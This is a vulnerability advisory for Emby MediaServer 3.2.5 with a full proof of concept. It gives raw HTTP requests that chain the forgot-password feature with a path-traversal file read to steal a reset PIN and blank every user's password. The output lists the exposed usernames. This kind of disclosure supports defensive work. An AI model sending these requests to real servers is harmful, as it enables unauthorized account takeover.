Emby MediaServer 3.2.5 Password Reset Vulnerability Vendor: Emby LLC Product web page: https://www.emby.media Affected version: 3.2.5 3.1.5 3.1.2 3.1.1 3.1.0 3.0.0 Summary: Emby (formerly Media Browser) is a media server designed to organize, play, and stream audio and video to a variety of devices. Emby is open-source, and uses a client-server model. Two comparable media servers are Plex and Windows Media Center. Desc: The issue can be triggered by an unauthenticated actor within the home network (LAN) only. The attacker doesn't need to specify a valid username to reset the password. He or she can enter a random string, and using the file disclosure issue it's possible to read the PIN needed for resetting. This in turn will disclose all the valid usernames in the emby server and reset all the passwords for all the users with a blank password. Attackers can exploit this to gain unauthenticated and unauthorized access to the emby media server management interface. Tested on: Microsoft Windows 7 Professional SP1 (EN) Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50 Ubuntu Linux 14.04.5 MacOS Sierra 10.12.3 SQLite3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2017-5401 Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5401.php SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098 22.12.2016 -- 1. First we initiate the Forgot Password feature from within our home network: ------------------------------------------------------------------------------ http://10.211.55.3:8096/web/forgotpassword.html 2. Then, we type any random username and hit submit: ---------------------------------------------------- POST /emby/Users/ForgotPassword HTTP/1.1 Host: 10.211.55.3:8096 Connection: keep-alive Content-Length: 32 accept: application/json Origin: http://10.211.55.3:8096 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0" content-type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://10.211.55.3:8096/web/forgotpassword.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8,mk;q=0.6 DNT: 1 EnteredUsername=RandomusUsuarius 3. You will get an alert message (Windows/Linux): ------------------------------------------------- The following file has been created on your server and contains instructions on how to proceed: C:\Users\lqwrm\AppData\Roaming\\Emby-Server\passwordreset.txt -- OR -- /var/lib/emby-server/passwordreset.txt 4. Exploiting the file disclosure vulnerability (ZSL-2017-5403): ---------------------------------------------------------------- GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\lqwrm\AppData\Roaming\Emby-Server\passwordreset.txt HTTP/1.1 Host: 10.211.55.3:8096 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, sdch Accept-Language: en-US,en;q=0.8 Connection: close HTTP/1.1 200 OK X-UA-Compatible: IE=Edge Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS Access-Control-Allow-Origin: * Vary: Accept-Encoding ETag: "c4fd834ac2fc99ff99d74c8e994a8a71" Cache-Control: public Expires: -1 Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50 Content-Type: text/plain Date: Tue, 28 Feb 2017 12:14:51 GMT Content-Length: 164 Connection: close Use your web browser to visit: http://10.211.55.3:8096/web/forgotpasswordpin.html Enter the following pin code: 6727 The pin code will expire at 91 5. Following the instructions, entering the PIN, results in resetting all the passwords for all the emby users on the system: ----------------------------------------------------------------------------------------------------------------------------- POST /emby/Users/ForgotPassword/Pin HTTP/1.1 Host: 10.211.55.3:8096 Connection: keep-alive Content-Length: 9 accept: application/json Origin: http://10.211.55.3:8096 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0" content-type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://10.211.55.3:8096/web/forgotpasswordpin.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8,mk;q=0.6 DNT: 1 Pin=6272 --- We get the message: Passwords have been removed for the following users. To login, sign in with a blank password. testingus test321 beebee admin ztefan lio miko dni embyusertest joxypoxy test123 thricer teppei admin2 delf1na